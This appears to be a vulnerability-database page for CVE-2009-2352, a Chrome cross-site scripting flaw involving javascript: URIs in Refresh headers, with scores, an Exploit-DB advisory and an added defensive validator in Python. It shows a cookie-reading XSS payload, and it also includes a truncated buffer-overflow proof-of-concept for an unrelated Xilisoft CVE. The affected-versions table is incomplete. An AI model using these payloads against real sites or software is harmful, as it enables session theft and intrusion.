CVE-2009-2352
Published 2009-07-07
Priority: P4 17 | Severity: medium | CVSS 2.0: 4.3
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 2.05% (78.8th percentile)
Google Chrome 1.0.154.48 and earlier does not block javascript: URIs in Refresh headers in HTTP responses, which allows remote attackers to conduct cross-site scripting (XSS) attacks via vectors related to (1) injecting a Refresh header or (2) specifying the content of a Refresh header, a related issue to CVE-2009-1312. NOTE: it was later reported that 2.0.172.28, 2.0.172.37, and 3.0.193.2 Beta are also affected.
Affected
16 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| | chrome | <= 1.0.154.48 | — |
| | chrome | — | — |
No detection rules found.
Exploit-DB
Google Chrome 0.3.154 - 'JavaScript:' URI in 'Refresh' Header Cross-Site Scripting
exploitdb·2009-06-03
CVE-2009-2352 Google Chrome 0.3.154 - 'JavaScript:' URI in 'Refresh' Header Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/35572/info
Google Chrome is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to execute arbitrary script code in the context of the user running the application and to steal cookie-based authentication credentials and other sensitive data that may aid in further attacks.
Chrome 1.0.154.48 is vulnerable; other versions may also be affected.
A request to a script on the web site:
http://www.example.com/script.php?param=javascript:alert(document.cookie)
returns the following Refresh header in the response:
refresh: 0; URL=javascript:alert(document.cookie)
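A server-side check for the pattern above, as an added example that is not part of the advisory: the script validates the parameter before reflecting it into a Refresh header, so the response is safe regardless of how the browser treats `javascript:` URIs. The function names, `ALLOWED_HOSTS` and `FALLBACK` are assumptions made for illustration.

```python
# Added example (not from the advisory): validate a user-supplied redirect
# target before reflecting it into a Refresh header.
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"www.example.com"}  # assumption: hosts this site may redirect to
FALLBACK = "/"                       # assumption: safe default landing page


def safe_refresh_target(param):
    """Return param if it is a safe redirect target, otherwise FALLBACK."""
    # Control characters: CR/LF would let the value inject extra headers,
    # and browsers drop tab/newline inside URLs ("java\tscript:" still runs).
    if not param or any(ord(c) < 0x20 or ord(c) == 0x7F for c in param):
        return FALLBACK
    # Leading/trailing whitespace is ignored by browsers, so refuse it here.
    if param != param.strip():
        return FALLBACK
    # Browsers treat "\" like "/" in http(s) URLs, so "/\host" leaves the site.
    if "\\" in param:
        return FALLBACK
    # Same-site path: exactly one leading slash ("//host" is scheme-relative).
    if param.startswith("/") and not param.startswith("//"):
        return param
    try:
        parts = urlsplit(param)
    except ValueError:
        return FALLBACK
    # Scheme allowlist rejects javascript:, data:, vbscript: and anything else.
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return FALLBACK
    # hostname is lowercased and excludes userinfo ("trusted@evil" tricks).
    if parts.hostname not in ALLOWED_HOSTS:
        return FALLBACK
    return param


def refresh_header(param, delay=0):
    """Build the (name, value) pair for a Refresh header from untrusted input."""
    return ("Refresh", f"{delay}; URL={safe_refresh_target(param)}")


if __name__ == "__main__":
    # Constructed sample inputs, including the value from the advisory.
    for value in ("javascript:alert(document.cookie)", "/account?tab=1",
                  "https://www.example.com/home", "//evil.example.net/"):
        print(repr(value), "->", refresh_header(value))
```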
Exploit-DB
Xilisoft Video Converter Wizard 3 - '.cue' Stack Buffer Overflow (PoC)
exploitdb·2009-04-10
CVE-2009-1370 Xilisoft Video Converter Wizard 3 - '.cue' Stack Buffer Overflow (PoC)
---
/*
Xilisoft Video Converter Wizard 3 .CUE File Stack Buffer Overflow POC
name: xilisoft.cpp
Credits : fl0 fl0w
Screenshot in the debugger
Link: http://www.downloadatoz.com/xilisoft-video-converter/wizard.html
http://img23.imageshack.us/my.php?image=xilisoftvideoconverter.jpg
*/
//Start
#include
#include
#include
#include
#include
#define SIZE 100000
#define FILE_FF " BINARY.. TRACK 01 MODE2/2352.. INDEX 01 00:00:00.."
class EXPLOIT {
public:
int check (char *, char *);
void Usage (char *);
};
static int Poz = 1;
static int Neg = 0;
int i;
char Name [SIZE];
char NeWbuff [SIZE];
int main (int argc, char *argv [])
{
EXPLOIT VIDEO;
if ( argc < 2)
VIDEO.Usage ( argv [0]);
if ( VIDEO.check ( argv [1
No writeups or analysis indexed.
http://websecurity.com.ua/3275/
http://websecurity.com.ua/3386/
http://www.securityfocus.com/archive/1/504718/100/0/threaded
http://www.securityfocus.com/archive/1/504723/100/0/threaded
http://www.securityfocus.com/bid/35572
Published: 2009-07-07